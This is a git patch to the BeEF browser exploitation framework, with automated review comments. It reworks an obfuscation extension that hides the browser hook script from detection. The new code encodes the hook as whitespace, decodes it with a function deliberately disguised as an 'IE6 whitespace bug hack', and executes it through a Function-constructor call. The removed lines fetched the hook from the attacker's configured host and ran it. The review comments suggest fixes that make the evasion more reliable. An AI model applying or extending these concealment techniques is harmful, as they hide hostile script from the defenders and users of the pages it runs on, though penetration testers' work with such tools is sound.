From e86712413ca64d0c9f0a646ad1481320680153b9 Mon Sep 17 00:00:00 2001
From: Jean-Louis Huynen
Date: Wed, 29 Aug 2012 18:22:22 +0200
Subject: [PATCH] modified whitespace evasion technique to keep it simple
- modified beefjs (just one line, i don't had much time to investigate my change but it seems to work better with it than without it :)
---
 core/main/handlers/modules/beefjs.rb | 3 +-
 extensions/evasion/config.yaml | 5 +-
 extensions/evasion/extension.rb | 1 +
 extensions/evasion/obfuscation/whitespace.rb | 76 ++++++++------------
 4 files changed, 35 insertions(+), 50 deletions(-)
diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb
index 8e30ae735..38e48f05c 100644
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -104,8 +104,7 @@ module BeEF
 if config.get("beef.extension.evasion.enable")
 evasion = BeEF::Extension::Evasion::Evasion.instance
- @hook = evasion.add_bootstrapper + evasion.obfuscate(@hook)
- @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate) + @hook
+ @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
 else
 @final_hook = ext_js_to_not_obfuscate + @hook
 end
diff --git a/extensions/evasion/config.yaml b/extensions/evasion/config.yaml
index 712989a31..7d9db7f91 100644
--- a/extensions/evasion/config.yaml
+++ b/extensions/evasion/config.yaml
@@ -16,7 +16,7 @@ beef:
 extension:
 evasion:
- enable: true
+ enable: true
 name: 'Evasion'
 authors: ["antisnatchor"]
 exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js"]
@@ -26,4 +26,5 @@ beef:
 beef: "beef"
 Beef: "Beef"
 evercookie: "evercookie"
- chain: ["scramble", "minify"]
+ #chain: ["scramble", "minify"]
+ chain: ["minify", "base64", "whitespace"]
diff --git a/extensions/evasion/extension.rb b/extensions/evasion/extension.rb
index ce1fc360e..e7e5c25d5 100644
--- a/extensions/evasion/extension.rb
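Review bot: The new line concatenates `ext_js_to_obfuscate + @hook` with no separator before handing the result to `obfuscate`, so if `ext_js_to_obfuscate` (assembled outside this hunk) does not end in a newline or `;`, its last statement fuses with the first statement of the core hook and the obfuscated bundle fails to parse on the hooked page; `evasion.obfuscate(ext_js_to_obfuscate + "\n" + @hook)` makes the join independent of how the extension JS is built. Since the commit message says this line was not investigated, a comment stating the intended order would help the next reader, e.g. `# plain-text bootstrapper (decoders) first, then one obfuscated bundle of extension JS plus the core hook`. The enclosing method starts and ends outside the hunk.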
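Review bot: The old default is left behind as a commented-out line `#chain: ["scramble", "minify"]` directly above the new `chain:` entry; dead configuration drifts from the real defaults, so drop it (history is in version control) or replace it with a comment that says what the list means, e.g. `# obfuscation steps, applied left to right`. The change also removes `scramble` from the default chain for every existing deployment, which the commit message does not mention and should state.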
+++ b/extensions/evasion/extension.rb
@@ -30,3 +30,4 @@ require 'extensions/evasion/helper'
 require 'extensions/evasion/obfuscation/scramble'
 require 'extensions/evasion/obfuscation/minify'
 require 'extensions/evasion/obfuscation/base_64'
+require 'extensions/evasion/obfuscation/whitespace'
diff --git a/extensions/evasion/obfuscation/whitespace.rb b/extensions/evasion/obfuscation/whitespace.rb
index 5f640651c..8c20217f4 100644
--- a/extensions/evasion/obfuscation/whitespace.rb
+++ b/extensions/evasion/obfuscation/whitespace.rb
@@ -20,56 +20,40 @@ module BeEF
 include Singleton
 def need_bootstrap
- false
+ true
+ end
+
+ def get_bootstrap
+ # the decode function is in plain text - called IE-spacer - because trolling is always a good idea
+ decode_function =
+"//Dirty IE6 whitespace bug hack
+function IE_spacer(css_space) {
+ var spacer = '';
+ for(y = 0; y < css_space.length/8; y++)
+ {
+ v = 0;
+ for(x = 0; x < 8; x++)
+ {
+ if(css_space.charCodeAt(x+(y*8)) > 9)
+ {
+ v++;
+ }
+ if(x != 7)
+ {
+ v = v << 1;
+ }
+ }
+ spacer += String.fromCharCode(v);
+ }return spacer;
+}"
 end
 def execute(input, config)
- print_debug input.length
+ size = input.length
 encoded = encode(input)
- var_name = BeEF::Extension::Evasion::Helper::random_string(3)
-
- config = BeEF::Core::Configuration.instance
- hook = config.get("beef.http.hook_file")
- host = config.get("beef.http.host")
- port = config.get("beef.http.port")
- decode_function =
-"
-//Dirty IE6 whitespace bug hack
-#{var_name} = function (){
- jQuery.get(\'http://#{host}:#{port}#{hook}\', function callback(data) {
- var output = '';
- var str = '//E'+'OH';
- var chunks = data.split(str);
- for (var i = 0; i < chunks.length; i++)
- {
- if(chunks[i].substring(0,4) == '----')
- {
- input = chunks[i].split('\\n');
- input = input[0].substring(5);
- for(y = 0; y < input.length/8; y++)
- {
- v = 0;
- for(x = 0; x < 8; x++)
- {
- if(input.charCodeAt(x+(y*8)) > 9)
- {
- v++;
- }
- if(x != 7)
- {
- v = v << 1;
- }
- }
- output += String.fromCharCode(v);
- }
- }
- }alert(output.length);[].constructor.constructor(output)();
- }, 'text');
-}
-#{var_name}();//EOH-----"
-
- input = "#{decode_function}#{encoded}"
- print_debug "[OBFUSCATION - WHITESPACE] Javascript has been Whitespace Encoded"
+ var_name = BeEF::Extension::Evasion::Helper::random_string(3)
+ input = "var #{var_name}=\"#{encoded}\";[].constructor.constructor(IE_spacer(#{var_name}))();"
+ print_debug "[OBFUSCATION - WHITESPACE] #{size}byte of Javascript code has been Whitespaced"
 input
 end
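Review bot: `IE_spacer` in the new `get_bootstrap` string assigns `y`, `v` and `x` without `var`, so on the hooked page they become globals that the page's own scripts can overwrite mid-decode (and vice versa), corrupting the output; declare them locally with `for(var y = 0; y < css_space.length/8; y++)`, `var v = 0;` and `for(var x = 0; x < 8; x++)`. In `execute`, the encoded payload is now inlined into a JS double-quoted literal (`var #{var_name}=\"#{encoded}\"`), which only holds if `encode` (defined outside this hunk) never emits a line terminator, `"` or `\`, and if no later step of the chain strips whitespace; I would record both constraints in a comment above the `input =` line, e.g. `# encoded must be tab/space only and this obfuscator must be the last step of the chain`. The `config` parameter of `execute` is no longer read now that the shadowing local was removed, and the `decode_function` local in `get_bootstrap` is assigned but never used; rename the former `_config` if the signature is shared with the other obfuscators, and return the string literal directly for the latter.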